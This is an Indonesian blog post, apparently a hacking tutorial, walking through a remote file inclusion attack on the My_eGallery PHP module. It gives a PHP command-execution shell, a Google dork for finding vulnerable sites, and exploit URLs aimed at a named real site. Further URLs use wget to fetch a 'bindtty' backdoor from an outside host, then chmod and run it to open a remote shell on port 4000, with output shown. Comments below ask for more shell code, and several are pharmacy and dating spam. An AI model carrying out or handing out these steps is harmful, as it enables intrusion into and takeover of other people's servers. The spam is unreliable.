10
My_eGallery Injection

.
Bug ini mungkin sudah agak lama, tapi masih banyak yg bisa kita
mainkan hehhe..(itulah gunanya google kali yah). Bug ini terdapat pada
"My_eGallery", pada dasarnya hal ini terjadi ketika "intruder"
men-supply parameter(dalam bentuk kode php) pada My_eGallery site
target melalui web site "intruder".

=====Start PHP Code=========

// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
print_output();
?>

==========End===============

Nah..mari kita coba yah (mulai deh bagian menarik nya..hehehe),
pertama-tama upload PHP code
itu ke situs kamu(bisa dalam bentuk .txt). Atau kalo kamu males bisa
kalian ambil dari
http://www.geocities.com/java_sas/pascal.txt
Ok..sekarang mari kita buka situs favorit saya "www.google.com" (found
most everything here!!),
lalu kita masukkan keyword nya : allinurl:my_eGallery site:.com (.com
itu bisa diganti sesuai
dgn keinginan kalian,.net,.id,.tv,etc)...Hasilnya...!!! banyak kan..hehehe

Mari kita siapkan peralatan kita..apa yah? cuman browser kok, explorer
atau netscape:) simpel
kan? Nah kalo udah mari kita masukkan url yg kita dapatkan di google
tadi dan kita gabungkan
dengan letak php kode pada situs kita :

http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.php?
basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=uname%20-a

mari kita amati dulu :
*http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.php
= adalah situs target dan direktori tempat my_eGallery

*http://www.geocities.com/java_sas/pascal.txt = adalah site intruder
dimana php kode tadi kita simpan
*cmd=uname%20-a = apa mesti saya kasih tahu? hehehehe

oke mari kita lihat apa yg browser hasilkan dari url tadi :

Linux server1.fastsecurehost.com 2.4.22-1.2174.nptlsmp #1 SMP Wed Feb 18
16:21:50 EST 2004 i686 i686 i386 GNU/Linux
waaaaaaaaaaaaaaaaa..hehehe di excute euyyy command nya..!!lalu biar
tambah menarik gimana kalo kita upload "bindtty" ke situs target,biar
kita bisa melakukan telnet kesitu :)

http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.
php?basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=cd%20
/var/tmp%20;%20wget%20www.renjana.ws/~toa/bindtty

perhatikan : cmd=cd%20/var/tmp%20;%20wget%20www.renjana.ws/~toa/bindtty
mengingat kita bukan root maka upload file biasanya diperbolehkan di
direktori /var/tmp, lalu tinggak di wget deh bindtty(disini saya ambil
dari www.renjana.ws/~toa/bindtty)
Lihat apa yg dihasilkan browser :

--04:22:42-- http://www.renjana.ws/%7Etoa/bindtty
=> `bindtty'
Resolving www.renjana.ws... done.
Connecting to www.renjana.ws[66.111.56.80]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,380 [text/plain]

0K .......... ........ 100% 151.41 KB/s

04:22:43 (151.41 KB/s) - `bindtty' saved [19380/19380]

upssss...bisa euyyy :) 1/2 jalan neh udah hehehe..setelah bindtty telah
tersimpan di situs target sekarang kita hanya perlu menjalankannya, tapi
sebelumnya tentu saja kita ubah dulu permission nya:

http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.
php?basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=cd%20
/var/tmp%20;%20chmod%20755%20bindtty

nah setelah ini baru deh bbisa kita running program bindtty nya :

http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory
.php?basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=cd%20
/var/tmp%20;%20./bindtty

Dan di browser kamu akan terlihat pid dari bindtty itu..hehehe..sudah
jalan neh!! Sekarang buka deh telnet (kalo aku sih biasanya pake putty)
telnet situs target di port 4000 (berhubung bindtty di
www.renjana.ws/~toa/bindtty di set pada port 4000)
Nah jadi lebih enak kalo di telnet..hehehe
$bash id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
selanjutnya...., terserah anda donk...


Bookmark and Share


10 komentar :

Bima mengatakan... [Reply to comment]

Pertanyaannya cuma satu..

Saya tidak punya PHP Code,,

boleh saya minta PHP Code yang terbaru nya gan..

selain di geocities.com apalagi yg bisa dipake upload file kita yg gratis dan bagus... hehehe..

Mohon bantuan gan..

Anonim mengatakan... [Reply to comment]

wordpress.com

Anonim mengatakan... [Reply to comment]

to buy miu miu handbags online

Anonim mengatakan... [Reply to comment]

must look at this chanel wallets to get new coupon

Anonim mengatakan... [Reply to comment]

[url=http://certifiedpharmacy.co.uk/products/lukol.htm][img]http://onlinemedistore.com/1.jpg[/img][/url]
texas stateboard of pharmacy http://certifiedpharmacy.co.uk/categories/anti-depressant-anti-anxiety.htm springfield va pharmacy [url=http://certifiedpharmacy.co.uk/products/mxman.htm]cvs pharmacy benefits[/url]
texas jurisprudence study pharmacy http://certifiedpharmacy.co.uk/products/celebrex.htm compair walmart pharmacy [url=http://certifiedpharmacy.co.uk/products/symmetrel.htm]symmetrel[/url]
amber pharmacy http://certifiedpharmacy.co.uk/products/noroxin.htm va pharmacy do they have plavic [url=http://certifiedpharmacy.co.uk/products/differin.htm]unversity of maryland school of pharmacy[/url]
offshore pharmacy phentermine http://certifiedpharmacy.co.uk/categories/erectile-dysfunction.htm valid pharmacy license without restriction [url=http://certifiedpharmacy.co.uk/products/serophene.htm]serophene[/url]

Anonim mengatakan... [Reply to comment]

[url=http://certifiedpharmacy.co.uk/catalogue/k.htm][img]http://onlinemedistore.com/5.jpg[/img][/url]
locations of omnicare pharmacy http://certifiedpharmacy.co.uk/products/lozol.htm pharmacy supply dc [url=http://certifiedpharmacy.co.uk/products/dipyridamole.htm]bremo pharmacy richmond va[/url]
ekard pharmacy http://certifiedpharmacy.co.uk/catalogue/m.htm canadian pharmacy lipitor [url=http://certifiedpharmacy.co.uk/products/celexa.htm]celexa[/url]
scriptx pharmacy http://certifiedpharmacy.co.uk/products/claritin.htm dan heller pharmacy [url=http://certifiedpharmacy.co.uk/products/eulexin.htm]infuserve pharmacy[/url]
associate of arts degree pharmacy technician http://certifiedpharmacy.co.uk/catalogue/g.htm parkway pharmacy crozet [url=http://certifiedpharmacy.co.uk/products/citalopram.htm]citalopram[/url]

Anonim mengatakan... [Reply to comment]

[url=http://certifiedpharmacy.co.uk/categories/weight-loss.htm][img]http://onlinemedistore.com/6.jpg[/img][/url]
kingwood pharmacy chattanooga http://certifiedpharmacy.co.uk/products/zyban.htm pharmacy at leeds university [url=http://certifiedpharmacy.co.uk/products/ceftin.htm]nj pharmacy newsletter[/url]
pharmacy schools in tennessee http://certifiedpharmacy.co.uk/products/kytril.htm pharmacy and education [url=http://certifiedpharmacy.co.uk/products/ed-discount-pack-2.htm]ed discount pack 2[/url]
neighborcare pharmacy http://certifiedpharmacy.co.uk/catalogue/k.htm purchase evista pharmacy rx on line [url=http://certifiedpharmacy.co.uk/products/azulfidine.htm]eckherd pharmacy[/url]
pharmacy consult refills order days stated medication http://certifiedpharmacy.co.uk/products/vantin.htm walmart holiday pharmacy [url=http://certifiedpharmacy.co.uk/products/pepcid.htm]pepcid[/url]

Anonim mengatakan... [Reply to comment]

[url=http://englandpharmacy.co.uk/products/zyban.htm][img]http://onlinemedistore.com/12.jpg[/img][/url]
cost acounting pharmacy http://englandpharmacy.co.uk/products/indocin.htm test pharmacy technician [url=http://englandpharmacy.co.uk/products/mobic.htm]pharmacy tech conferences[/url]
maintaining pharmacy records http://englandpharmacy.co.uk/products/starlix.htm pharmacy open 24 hours in tennessee [url=http://englandpharmacy.co.uk/products/trental.htm]trental[/url]
pharmacy hood testing http://englandpharmacy.co.uk/products/lynoral.htm costcutters pharmacy [url=http://englandpharmacy.co.uk/products/flonase.htm]ub pharmacy law review[/url]
compounding pharmacy arthritis http://englandpharmacy.co.uk/products/metformin.htm pharmacy index [url=http://englandpharmacy.co.uk/products/nolvadex.htm]nolvadex[/url]

Anonim mengatakan... [Reply to comment]

latin photo dating directory yahoo [url=http://freeinternetdating.info/socialnetwork/brown-pride-background-for-myspace]brown pride background for myspace[/url] the dating game chicago
speed dating hagerstown http://freeinternetdating.info/bride/russian-bride-agency dating france sex before
pagan dating in los angeles [url=http://freeinternetdating.info/dating/dallas-dating-spots]dating malaysia women[/url] write a great dating ad

Anonim mengatakan... [Reply to comment]

indian dating services http://loveepicentre.com/testimonials/ free passwords for dating websites
best review married dating free [url=http://loveepicentre.com/contact/]dating workshops[/url] dating magazines of your
freethink agnostic dating [url=http://loveepicentre.com/success_stories/]free online bdsm dating sites[/url] dating transsexuals fega777 [url=http://loveepicentre.com/user/Cindy1011/]Cindy1011[/url] black dating in pensacola

Posting Komentar

Silahkan tinggalkan komentar anda disini...

 
Ujie Caprone | © 2011 Blogger Template by Ujiecaprone.com